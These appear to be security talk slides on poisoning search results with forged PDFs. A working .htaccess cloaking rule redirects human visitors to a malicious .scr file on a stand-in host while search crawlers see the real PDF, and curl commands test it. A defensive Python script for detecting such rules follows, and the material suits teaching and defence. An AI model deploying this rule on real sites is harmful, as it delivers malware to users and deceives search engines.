<h2>PDF D0CUM3NT</h2>
OCR
Optical Character Recognition
<h2>F0RG3D PDF</h2>
<h3>STRUCTURE - PDF OUTPUT</h3>
The criminal's aim is to have as many keywords tied to the target audience as possible in the forged files.
1. {image}
2. {random title} - {current date}
3. {random keywords}
4. {random hashtag keywords}
5. {complementary text}
6. {keywords formatted as links}
The phisher's side
<h2>S3RVER S1DE</h2>
M0D1FIED .htaccess F1LE
To hack on a significant scale and also guarantee that victims reach the criminal's (URLs || malicious files), the criminal can refine the .htaccess file so that the indexing bot (web crawler) has access to its content, but not the target user, who is redirected to a third-party site.

<ifmodule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} !(Googlebot|bingbot|Yahoo)
RewriteRule (.+\.pdf)$ http://www.sitemalicioso2.uk/exploit-pdf.scr [R=301,L]
</ifmodule>

# T3ST R3QUEST:
0x27null@phishing:~$ curl localhost/teste/Carro.pdf -v | grep '301'
# RETURN HTTP HEADER:
< HTTP/1.1 301 Moved Permanently
< Server: Apache/2.4.12 (Ubuntu)
< Location: http://www.sitemalicioso2.uk/exploit-pdf.scr

# T3ST R3QUEST / S3T BOT USER-AGENT:
0x27null@phishing:~$ curl -I localhost/teste/Carro.pdf -v --user-agent \
'XX/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)' -v | grep --color \
'pdf'
# RETURN HTTP HEADER:
< HTTP/1.1 200 OK
< Server: Apache/2.4.12 (Ubuntu)
< Content-Type: application/pdf
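
A defender-side check for the cloaking rule above, as an added example that is not part of the original slides: it scans .htaccess text for a RewriteRule that redirects to an absolute URL and is gated by a User-Agent condition naming crawlers. The function name, the crawler list beyond the three names in the slide, and the sample input are assumptions made for this example.

```python
import re

# Crawler names to look for; the first three come from the rule on this page.
CRAWLER_TOKENS = ("googlebot", "bingbot", "yahoo", "slurp", "baiduspider", "yandex")
COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)


def find_cloaking_rules(htaccess_text):
    """Flag RewriteRules that redirect to an absolute URL and are gated by a
    User-Agent condition naming search-engine crawlers."""
    findings, pending = [], []  # pending RewriteConds apply to the next rule only
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending.append(cond.groups())
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        pattern, target = rule.groups()
        for test_string, cond_pattern in pending:
            names = [t for t in CRAWLER_TOKENS if t in cond_pattern.lower()]
            if ("http_user_agent" in test_string.lower() and names
                    and re.match(r"https?://", target, re.I)):
                findings.append({
                    "line": lineno, "pattern": pattern, "target": target,
                    "crawlers": names,
                    # "!" negates: crawlers are exempt, everyone else is redirected
                    "visitors_redirected": cond_pattern.startswith("!"),
                })
        pending = []
    return findings

# Constructed sample: a benign HTTPS upgrade followed by the rule from this page.
SAMPLE = r"""
<ifmodule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
RewriteCond %{HTTP_USER_AGENT} !(Googlebot|bingbot|Yahoo)
RewriteRule (.+\.pdf)$ http://www.sitemalicioso2.uk/exploit-pdf.scr [R=301,L]
</ifmodule>
"""

if __name__ == "__main__":
    for finding in find_cloaking_rules(SAMPLE):
        print(finding)
```

Conditions whose pattern is quoted and contains spaces are not parsed by this matcher, so a clean result does not replace comparing live responses under a browser and a crawler User-Agent.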
Trust relationship
<h2>600gl3 AdWord5</h2>
Potential daily reach: 1K clicks, 57K impressions
Ad
Trust relationship
<h2>1NF3CT3D S34RCH</h2>
ORGANIC R3SULT
SPONSORED R3SULT
It is an exploitation of the trust relationship between the user and their favorite web application, since it will not offer used-car content to someone who, for the most part, likes pages (Facebook), searches for cinema keywords or searches for sewing.
Infographic
<marquee>TH4NK Y0U</marquee>
0x27null@phishing:~$ php c0n7a7o.php
[ + ] Name: Cleiton Pinheiro
[ + ] E-mail: 0x27null@gmail.com
[ + ] Twitter: @0x27null
[ + ] Blog: http://blog.0x27null.com
[ + ] GIT: https://github.com/googleinurl
[ + ] Specialty: GED - Gambiarras Exploits Dorking